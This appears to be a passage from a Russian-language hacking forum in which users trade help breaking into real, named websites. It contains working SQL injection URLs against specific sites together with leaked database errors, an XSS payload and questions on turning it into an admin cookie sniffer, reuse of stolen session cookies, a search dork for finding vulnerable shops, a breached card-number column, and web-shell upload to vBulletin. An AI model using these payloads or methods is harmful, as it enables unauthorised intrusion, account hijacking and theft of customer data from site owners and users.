Здравствуйте. Есть доступ к бд сайта на wordpress, но проблема в том что я не знаю адрес самого сайта 0_о Внимание вопрос: Можно ли узнать адрес ресурса на wordpress имея доступ к его БД? И если можно то подскажите в какой таблице искать плиз.
Code: http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x не пойму как дальше таблицы и колонки вывести
Code: http://www.linleygroup.com/events/event.php?num=-500000+/*!UnION*/+/*!SElECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+ Прошу помощи в раскрутке.
MySQL Error: Duplicate entry '5.0.92-community:linley5_tlgcms:linley5_linley5@localhost:unknow' for key 1 MySQL Error: Duplicate entry 'linley5_tlgcms:cms_accounts: password1' for key 1
http://www.euromet.ru/search/?search=ololo'%20and%20updatexml(0x03b,concat(0x3b,(select%20table_name%20FROM%20information_schema.tables%20limit%200,1)),0x03b)--%20x Error Number: 1105 XPATH syntax error: ';CHARACTER_SETS' =\\
Похекать шоп не получится, так как стоит 4 ветка MySQL. 4.1.22-standard:theqice_manicefruit:theqice@localhost: pc-linux-gnu
При регистрации в поле вопрос я ввел "><script>alert(/XSS/)</script> потом взял поле востановить пароль ввел свой логин и код с картинки, потом меня переадресовует на страницу с вопросом и тогда высвечиваеться /XSS/ Вопрос: как сделать из этого снифер? И пожалуйста скажите когда я кину ссылку админу и он не будет авторизован на сайте то его куки не крадуться?(То есть нужно чтобы он был авторизован на сайте?)
проблемка есть....соснифал куки админа, меняю куки на его... рефрешу линку на админку... ноль эмоций. недоступен урл. может быть привязка к ip? есть еще варианты?
Всё получиться То что стоит что четвёртая версия, это значит что только невозможно узнать названия таблиц. Префикс таблиц: 'theqice_' Дорк: Code: inurl:"prodisp.php?prodcatind" Почти везде есть SQL-inj. Получаем доступ к одному из сайтов. Узнаём CMS/Названия таблиц. Ну а потом(Чисто теоретически) почти всех в этом списке, в том числе и ваш сайт можно похекать.
вынужден вас огорчить - колонка с номер карты зашифрована, и судя по длине, обратно расшифровать не получится
Как залить шел в vBulletin 4.0.3 если есть доступ к админке? Вот таблицы в admincp Что нажимать? просто я нап первый раз заливаю шел
Те что пишут: Способ заливки шелла в vBulletin 3.5.*. Способ заливки шелла в vBulletin 2.*.* и 3.0.* Я пробивал и нечего не получилось... Писало Error на линии 1010